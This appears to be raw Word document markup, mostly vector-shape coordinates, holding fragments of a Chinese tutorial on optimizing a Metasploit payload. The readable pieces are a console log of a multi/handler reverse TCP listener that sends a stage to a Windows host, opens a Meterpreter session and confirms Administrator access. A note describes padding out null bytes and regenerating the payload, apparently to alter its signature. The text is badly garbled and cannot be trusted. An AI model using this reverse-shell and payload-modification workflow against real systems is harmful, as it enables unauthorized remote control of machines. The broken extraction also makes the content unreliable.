3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7001,3446,7001,3446,7001,3446,7001,3446,7001,3446,7001,3446,7000,3446,7000,3446,7000,3446,7000,3446,6999,3446,6999,3446,6999,3446,6999,3446,6998,3446,6998,3446,6998,3446,6997,3446,6997,3446,6996,3446,6996,3446,6996,3446,6995,3446,6995,3446,6994,3446,6994,3446,6993,3446,6993,3446,6992,3446,6991,3446,6991,3446,6990,3446,6989,3446,6989,3446,6988,3446,6987,3446,6986,3446,6986,3446,6985,3446,6984,3446,6983,3446,6982,3446,6981,3446,6980,3446,6979,3446,6978,3446,6977,3446,6976,3446,6975,3446,6974,3446,6972,3446,6971,3446,6970,3446,6969,3446,6967,3446,6966,3446,6965,3446,6963,3446,6962,3446,6960,3446,6959,3446,6957,3446,6956,3446,6954,3446,6952,3446,6951,3446,6949,3446,6947,3446,6945,3446,6943,3446,6941,3446,6939,3446,6938,3446,6935,3446,6933,3446,6931,3446,6929,3446,6927,3446,6925,3446,6922,3446,6920,3446,6918,3446,6915,3446,6913,3446,6910,3446,6908,3446,6905,3446,6902,3446,6900,3446,6897,3446,6894,3446,6891,3446,6888,3446,6885,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3444,6882,3444,6882,3444,6882,3444,6882,3443,6882,3443,6882,3443,6882,3442,6882,3442,6882,3442,6882,3441,6882,3441,6882,3440,6882,3440,6882,3439,6882,3439,6882,3438,6882,3437,6882,3437,6882,3436,6882,3435,6882,3435,6882,3434,6882,3433,6882,3432,6882,3431,6882,3430,6882,3429,6882,3428,6882,3427,6882,3426,6882,3424,6882,3423,6882,3422,6882,3421,6882,3419,6882,3418,6882,3416,6882,3415,6882,3413,6882,3411,6882,3410,6882,3408,6882,3406,6882,3404,6882,3402,6882,3400,6882,3398,6882,3396,6882,3394,6882,3392,6882,3389,6882,3387,6882,3384,6882,3382,6882,3379,6882,3377,6882,3374,6882,3371,6882,3368,6882,3365,6882,3362,6882,3359,6882,3356,6882,3353,6882,3349,6882,3346,6882,3343,6882,3339,6882,3335,6882,3332,6882,3328,6882,3324,6882,3320,6882,3316,6882,3312,6882,3308,6882,3303,6882,3299,6882,3294,6882,3290,6882,3285,6882,3280,6882,3275,6882,3270,6882,3265,6882,3260,6882,3255,6882,3250,6882,3244,6882,3239,6882,3233,6882,3227,6882,3221,6882,3215,6882,3209,6882,3203,6882,3197,6882,3191e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.874pt;margin-top:192.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3377,3857" coordsize="142,282">
        <v:shape style="position:absolute;left:3377;top:3857;width:142;height:282" coordorigin="3377,3857" coordsize="142,282" path="m3416,3896l3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3417,3896,3417,3896,3417,3896,3417,3896,3417,3896,3417,3896,3417,3896,3418,3896,3418,3896,3418,3896,3418,3896,3419,3896,3419,3896,3419,3896,3419,3896,3420,3896,3420,3896,3420,3896,3421,3896,3421,3896,3421,3896,3422,3896,3422,3896,3423,3896,3423,3896,3424,3896,3424,3896,3425,3896,3425,3896,3426,3896,3426,3896,3427,3896,3428,3896,3428,3896,3429,3896,3430,3896,3430,3896,3431,3896,3432,3896,3433,3896,3434,3896,3434,3896,3435,3896,3436,3896,3437,3896,3438,3896,3439,3896,3440,3896,3441,3896,3442,3896,3443,3896,3445,3896,3446,3896,3447,3896,3448,3896,3450,3896,3451,3896,3452,3896,3454,3896,3455,3896,3456,3896,3458,3896,3459,3896,3461,3896,3463,3896,3464,3896,3466,3896,3468,3896,3469,3896,3471,3896,3473,3896,3475,3896,3477,3896,3479,3896,3481,3896,3483,3896,3485,3896,3487,3896,3489,3896,3491,3896,3494,3896,3496,3896,3498,3896,3501,3896,3503,3896,3505,3896,3508,3896,3511,3896,3513,3896,3516,3896,3519,3896,3521,3896,3524,3896,3527,3896,3530,3896,3533,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3897,3536,3897,3536,3897,3536,3897,3536,3897,3536,3897,3536,3898,3536,3898,3536,3898,3536,3898,3536,3899,3536,3899,3536,3899,3536,3900,3536,3900,3536,3900,3536,3901,3536,3901,3536,3902,3536,3902,3536,3903,3536,3904,3536,3904,3536,3905,3536,3906,3536,3906,3536,3907,3536,3908,3536,3909,3536,3910,3536,3911,3536,3912,3536,3913,3536,3914,3536,3915,3536,3916,3536,3917,3536,3918,3536,3920,3536,3921,3536,3923,3536,3924,3536,3925,3536,3927,3536,3929,3536,3930,3536,3932,3536,3934,3536,3936,3536,3938,3536,3939,3536,3941,3536,3944,3536,3946,3536,3948,3536,3950,3536,3952,3536,3955,3536,3957,3536,3960,3536,3962,3536,3965,3536,3968,3536,3971,3536,3973,3536,3976,3536,3979,3536,3983,3536,3986,3536,3989,3536,3992,3536,3996,3536,3999,3536,4003,3536,4006,3536,4010,3536,4014,3536,4018,3536,4022,3536,4026,3536,4030,3536,4034,3536,4038,3536,4043,3536,4047,3536,4052,3536,4057,3536,4061,3536,4066,3536,4071,3536,4076,3536,4081,3536,4087,3536,4092,3536,4097,3536,4103,3536,4109,3536,4114,3536,4120,3536,4126,3536,4132,3536,4138,3536,4145,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3534,4151,3534,4151,3534,4151,3534,4151,3534,4151,3533,4151,3533,4151,3533,4151,3533,4151,3532,4151,3532,4151,3532,4151,3532,4151,3531,4151,3531,4151,3531,4151,3530,4151,3530,4151,3529,4151,3529,4151,3528,4151,3528,4151,3527,4151,3527,4151,3526,4151,3526,4151,3525,4151,3525,4151,3524,4151,3523,4151,3523,4151,3522,4151,3521,4151,3520,4151,3520,4151,3519,4151,3518,4151,3517,4151,3516,4151,3515,4151,3514,4151,3513,4151,3512,4151,3511,4151,3510,4151,3509,4151,3508,4151,3507,4151,3506,4151,3505,4151,3503,4151,3502,4151,3501,4151,3499,4151,3498,4151,3496,4151,3495,4151,3494,4151,3492,4151,3490,4151,3489,4151,3487,4151,3486,4151,3484,4151,3482,4151,3480,4151,3478,4151,3477,4151,3475,4151,3473,4151,3471,4151,3469,4151,3467,4151,3465,4151,3462,4151,3460,4151,3458,4151,3456,4151,3453,4151,3451,4151,3449,4151,3446,4151,3444,4151,3441,4151,3438,4151,3436,4151,3433,4151,3430,4151,3427,4151,3425,4151,3422,4151,3419,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4150,3416,4150,3416,4150,3416,4150,3416,4150,3416,4150,3416,4149,3416,4149,3416,4149,3416,4149,3416,4148,3416,4148,3416,4148,3416,4147,3416,4147,3416,4147,3416,4146,3416,4146,3416,4145,3416,4145,3416,4144,3416,4143,3416,4143,3416,4142,3416,4141,3416,4141,3416,4140,3416,4139,3416,4138,3416,4137,3416,4136,3416,4135,3416,4134,3416,4133,3416,4132,3416,4131,3416,4130,3416,4129,3416,4127,3416,4126,3416,4124,3416,4123,3416,4122,3416,4120,3416,4118,3416,4117,3416,4115,3416,4113,3416,4111,3416,4110,3416,4108,3416,4106,3416,4103,3416,4101,3416,4099,3416,4097,3416,4095,3416,4092,3416,4090,3416,4087,3416,4085,3416,4082,3416,4079,3416,4076,3416,4074,3416,4071,3416,4068,3416,4065,3416,4061,3416,4058,3416,4055,3416,4051,3416,4048,3416,4044,3416,4041,3416,4037,3416,4033,3416,4029,3416,4025,3416,4021,3416,4017,3416,4013,3416,4009,3416,4004,3416,4000,3416,3995,3416,3990,3416,3986,3416,3981,3416,3976,3416,3971,3416,3966,3416,3960,3416,3955,3416,3950,3416,3944,3416,3938,3416,3933,3416,3927,3416,3921,3416,3915,3416,3909,3416,3902,3416,3896e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.874pt;margin-top:229.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3377,4597" coordsize="142,282">
        <v:shape style="position:absolute;left:3377;top:4597;width:142;height:282" coordorigin="3377,4597" coordsize="142,282" path="m3416,4631l3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3417,4631,3417,4631,3417,4631,3417,4631,3417,4631,3417,4631,3417,4631,3418,4631,3418,4631,3418,4631,3418,4631,3419,4631,3419,4631,3419,4631,3419,4631,3420,4631,3420,4631,3420,4631,3421,4631,3421,4631,3421,4631,3422,4631,3422,4631,3423,4631,3423,4631,3424,4631,3424,4631,3425,4631,3425,4631,3426,4631,3426,4631,3427,4631,3428,4631,3428,4631,3429,4631,3430,4631,3430,4631,3431,4631,3432,4631,3433,4631,3434,4631,3434,4631,3435,4631,3436,4631,3437,4631,3438,4631,3439,4631,3440,4631,3441,4631,3442,4631,3443,4631,3445,4631,3446,4631,3447,4631,3448,4631,3450,4631,3451,4631,3452,4631,3454,4631,3455,4631,3456,4631,3458,4631,3459,4631,3461,4631,3463,4631,3464,4631,3466,4631,3468,4631,3469,4631,3471,4631,3473,4631,3475,4631,3477,4631,3479,4631,3481,4631,3483,4631,3485,4631,3487,4631,3489,4631,3491,4631,3494,4631,3496,4631,3498,4631,3501,4631,3503,4631,3505,4631,3508,4631,3511,4631,3513,4631,3516,4631,3519,4631,3521,4631,3524,4631,3527,4631,3530,4631,3533,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4633,3536,4633,3536,4633,3536,4633,3536,4633,3536,4634,3536,4634,3536,4634,3536,4635,3536,4635,3536,4635,3536,4636,3536,4636,3536,4637,3536,4637,3536,4638,3536,4638,3536,4639,3536,4640,3536,4640,3536,4641,3536,4642,3536,4643,3536,4643,3536,4644,3536,4645,3536,4646,3536,4647,3536,4648,3536,4649,3536,4650,3536,4651,3536,4653,3536,4654,3536,4655,3536,4657,3536,4658,3536,4659,3536,4661,3536,4662,3536,4664,3536,4666,3536,4667,3536,4669,3536,4671,3536,4673,3536,4675,3536,4677,3536,4679,3536,4681,3536,4683,3536,4686,3536,4688,3536,4690,3536,4693,3536,4695,3536,4698,3536,4700,3536,4703,3536,4706,3536,4709,3536,4712,3536,4715,3536,4718,3536,4721,3536,4724,3536,4728,3536,4731,3536,4734,3536,4738,3536,4742,3536,4745,3536,4749,3536,4753,3536,4757,3536,4761,3536,4765,3536,4770,3536,4774,3536,4778,3536,4783,3536,4787,3536,4792,3536,4797,3536,4802,3536,4807,3536,4812,3536,4817,3536,4822,3536,4827,3536,4833,3536,4838,3536,4844,3536,4850,3536,4856,3536,4862,3536,4868,3536,4874,3536,4880,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3534,4886,3534,4886,3534,4886,3534,4886,3534,4886,3533,4886,3533,4886,3533,4886,3533,4886,3532,4886,3532,4886,3532,4886,3532,4886,3531,4886,3531,4886,3531,4886,3530,4886,3530,4886,3529,4886,3529,4886,3528,4886,3528,4886,3527,4886,3527,4886,3526,4886,3526,4886,3525,4886,3525,4886,3524,4886,3523,4886,3523,4886,3522,4886,3521,4886,3520,4886,3520,4886,3519,4886,3518,4886,3517,4886,3516,4886,3515,4886,3514,4886,3513,4886,3512,4886,3511,4886,3510,4886,3509,4886,3508,4886,3507,4886,3506,4886,3505,4886,3503,4886,3502,4886,3501,4886,3499,4886,3498,4886,3496,4886,3495,4886,3494,4886,3492,4886,3490,4886,3489,4886,3487,4886,3486,4886,3484,4886,3482,4886,3480,4886,3478,4886,3477,4886,3475,4886,3473,4886,3471,4886,3469,4886,3467,4886,3465,4886,3462,4886,3460,4886,3458,4886,3456,4886,3453,4886,3451,4886,3449,4886,3446,4886,3444,4886,3441,4886,3438,4886,3436,4886,3433,4886,3430,4886,3427,4886,3425,4886,3422,4886,3419,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4885,3416,4885,3416,4885,3416,4885,3416,4885,3416,4884,3416,4884,3416,4884,3416,4883,3416,4883,3416,4883,3416,4882,3416,4882,3416,4881,3416,4881,3416,4881,3416,4880,3416,4879,3416,4879,3416,4878,3416,4877,3416,4877,3416,4876,3416,4875,3416,4874,3416,4874,3416,4873,3416,4872,3416,4871,3416,4870,3416,4869,3416,4868,3416,4866,3416,4865,3416,4864,3416,4863,3416,4861,3416,4860,3416,4858,3416,4857,3416,4855,3416,4854,3416,4852,3416,4850,3416,4849,3416,4847,3416,4845,3416,4843,3416,4841,3416,4839,3416,4837,3416,4835,3416,4832,3416,4830,3416,4828,3416,4825,3416,4823,3416,4820,3416,4817,3416,4815,3416,4812,3416,4809,3416,4806,3416,4803,3416,4800,3416,4797,3416,4793,3416,4790,3416,4787,3416,4783,3416,4780,3416,4776,3416,4772,3416,4769,3416,4765,3416,4761,3416,4757,3416,4753,3416,4748,3416,4744,3416,4740,3416,4735,3416,4730,3416,4726,3416,4721,3416,4716,3416,4711,3416,4706,3416,4701,3416,4696,3416,4690,3416,4685,3416,4679,3416,4674,3416,4668,3416,4662,3416,4656,3416,4650,3416,4644,3416,4638,3416,4631e x" fillcolor="#fefefe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1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46" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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1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msf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exploit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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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)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exploit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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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3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Started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reverse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TCP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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on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192.168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.1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.5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53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4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Sending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stage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(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179779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bytes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)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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>to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192.168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.1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.119</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="3710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5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Meterpreter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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session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9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opened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(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192.168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.1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.5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53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192.168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.1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.119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3891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)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at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2019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‐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01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27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14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46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20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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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meterpreter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996c38"/>
          <w:spacing w:val="10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getuid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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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username:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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WIN03X64\Administrator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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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meterpreter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996c38"/>
          <w:spacing w:val="10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getpid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7702" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current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pid: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1232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11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64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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第三次优化p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload：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在00000E60起含有大部分000h，充填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掉00，在次生成payload。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1849" w:firstLine="0"/>
      </w:pP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3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3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3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3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3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3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3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3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3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3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3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4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5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5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5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5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5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5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5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5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5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5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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="104"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="104"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>000h,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="11" w:after="0" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="44"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="44"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>..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group style="position:absolute;margin-left:520.111pt;margin-top:735.95pt;width:0.0pt;height:106.904pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,14701" coordsize="0,2138">
        <v:shape style="position:absolute;left:10402;top:14701;width:0;height:2138" coordorigin="10402,14701" coordsize="0,2138" path="m10402,14701l10402,14701,10402,14701,10402,14701,10402,14701,10402,14701,10402,14702,10402,14702,10402,14702,10402,14702,10402,14702,10402,14703,10402,14703,10402,14704,10402,14704,10402,14705,10402,14706,10402,14707,10402,14708,10402,14709,10402,14710,10402,14712,10402,14713,10402,14715,10402,14717,10402,14719,10402,14721,10402,14724,10402,14726,10402,14729,10402,14732,10402,14736,10402,14739,10402,14743,10402,14747,10402,14751,10402,14756,10402,14761,10402,14766,10402,14771,10402,14777,10402,14783,10402,14789,10402,14795,10402,14802,10402,14809,10402,14817,10402,14825,10402,14833,10402,14842,10402,14851,10402,14860,10402,14870,10402,14880,10402,14890,10402,14901,10402,14913,10402,14924,10402,14936,10402,14949,10402,14962,10402,14975,10402,14989,10402,15004,10402,15019,10402,15034,10402,15050,10402,15066,10402,15083,10402,15100,10402,15118,10402,15137,10402,15156,10402,15175,10402,15195,10402,15216,10402,15237,10402,15258,10402,15281,10402,15304,10402,15327,10402,15351,10402,15376,10402,15401,10402,15427,10402,15453,10402,15481,10402,15508,10402,15537,10402,15566,10402,15596,10402,15626,10402,15658,10402,15689,10402,15722,10402,15755,10402,15789,10402,15824,10402,15859,10402,15896,10402,15933,10402,15970,10402,16009,10402,16048,10402,16088,10402,16129,10402,16170,10402,16213,10402,16256,10402,16300,10402,16345,10402,16390,10402,16437,10402,16484,10402,16532,10402,16581,10402,16631,10402,16682,10402,16734,10402,16786,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:734.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14690" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:14690;width:8990;height:390" coordorigin="1490,14690" coordsize="8990,390" path="m1510,14701l1510,14701,1510,14701,1510,14701,1510,14701,1510,14701,1510,14701,1511,14701,1512,14701,1512,14701,1514,14701,1515,14701,1517,14701,1519,14701,1521,14701,1524,14701,1528,14701,1532,14701,1536,14701,1541,14701,1546,14701,1552,14701,1559,14701,1566,14701,1575,14701,1583,14701,1593,14701,1603,14701,1615,14701,1627,14701,1640,14701,1654,14701,1668,14701,1684,14701,1701,14701,1719,14701,1738,14701,1758,14701,1780,14701,1802,14701,1826,14701,1851,14701,1877,14701,1904,14701,1933,14701,1963,14701,1995,14701,2028,14701,2063,14701,2099,14701,2136,14701,2175,14701,2216,14701,2259,14701,2303,14701,2348,14701,2396,14701,2445,14701,2496,14701,2549,14701,2604,14701,2660,14701,2719,14701,2779,14701,2841,14701,2906,14701,2972,14701,3041,14701,3112,14701,3184,14701,3259,14701,3336,14701,3416,14701,3498,14701,3582,14701,3668,14701,3757,14701,3848,14701,3941,14701,4037,14701,4136,14701,4236,14701,4340,14701,4446,14701,4555,14701,4666,14701,4780,14701,4897,14701,5017,14701,5139,14701,5264,14701,5392,14701,5523,14701,5657,14701,5793,14701,5933,14701,6076,14701,6222,14701,6370,14701,6522,14701,6677,14701,6835,14701,6997,14701,7161,14701,7329,14701,7500,14701,7675,14701,7853,14701,8034,14701,8219,14701,8407,14701,8598,14701,8793,14701,8992,14701,9194,14701,9400,14701,9609,14701,9823,14701,10039,14701,10260,14701,10484,14701,10484,14701,10484,14701,10484,14701,10484,14701,10484,14701,10484,14701,10484,14701,10484,14701,10484,14702,10484,14702,10484,14702,10484,14702,10484,14702,10484,14702,10484,14702,10484,14702,10484,14702,10484,14703,10484,14703,10484,14703,10484,14703,10484,14704,10484,14704,10484,14704,10484,14705,10484,14705,10484,14705,10484,14706,10484,14706,10484,14707,10484,14708,10484,14708,10484,14709,10484,14710,10484,14711,10484,14711,10484,14712,10484,14713,10484,14714,10484,14715,10484,14716,10484,14717,10484,14719,10484,14720,10484,14721,10484,14723,10484,14724,10484,14725,10484,14727,10484,14729,10484,14730,10484,14732,10484,14734,10484,14736,10484,14738,10484,14740,10484,14742,10484,14744,10484,14747,10484,14749,10484,14751,10484,14754,10484,14757,10484,14759,10484,14762,10484,14765,10484,14768,10484,14771,10484,14774,10484,14777,10484,14781,10484,14784,10484,14788,10484,14791,10484,14795,10484,14799,10484,14803,10484,14807,10484,14811,10484,14816,10484,14820,10484,14824,10484,14829,10484,14834,10484,14839,10484,14844,10484,14849,10484,14854,10484,14859,10484,14865,10484,14870,10484,14876,10484,14882,10484,14888,10484,14894,10484,14900,10484,14906,10484,14913,10484,14919,10484,14926,10484,14933,10484,14940,10484,14947,10484,14954,10484,14962,10484,14969,10484,14977,10484,14985,10484,14993,10484,15001,10484,15010,10484,15018,10484,15027,10484,15036,10484,15044,10484,15054,10484,15063,10484,15072,10484,15082,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10483,15092,10482,15092,10482,15092,10480,15092,10479,15092,10477,15092,10475,15092,10473,15092,10470,15092,10466,15092,10462,15092,10458,15092,10453,15092,10448,15092,10442,15092,10435,15092,10428,15092,10419,15092,10411,15092,10401,15092,10391,15092,10379,15092,10367,15092,10354,15092,10340,15092,10326,15092,10310,15092,10293,15092,10275,15092,10256,15092,10236,15092,10215,15092,10192,15092,10168,15092,10143,15092,10117,15092,10090,15092,10061,15092,10031,15092,9999,15092,9966,15092,9931,15092,9895,15092,9858,15092,9819,15092,9778,15092,9735,15092,9691,15092,9646,15092,9598,15092,9549,15092,9498,15092,9445,15092,9391,15092,9334,15092,9275,15092,9215,15092,9153,15092,9088,15092,9022,15092,8953,15092,8883,15092,8810,15092,8735,15092,8658,15092,8578,15092,8497,15092,8413,15092,8326,15092,8238,15092,8146,15092,8053,15092,7957,15092,7859,15092,7758,15092,7654,15092,7548,15092,7439,15092,7328,15092,7214,15092,7097,15092,6977,15092,6855,15092,6730,15092,6602,15092,6471,15092,6337,15092,6201,15092,6061,15092,5918,15092,5773,15092,5624,15092,5472,15092,5317,15092,5159,15092,4997,15092,4833,15092,4665,15092,4494,15092,4319,15092,4141,15092,3960,15092,3776,15092,3587,15092,3396,15092,3201,15092,3002,15092,2800,15092,2594,15092,2385,15092,2172,15092,1955,15092,1734,15092,1510,15092,1510,15092,1510,15092,1510,15092,1510,15092,1510,15092,1510,15092,1510,15092,1510,15092,1510,15091,1510,15091,1510,15091,1510,1509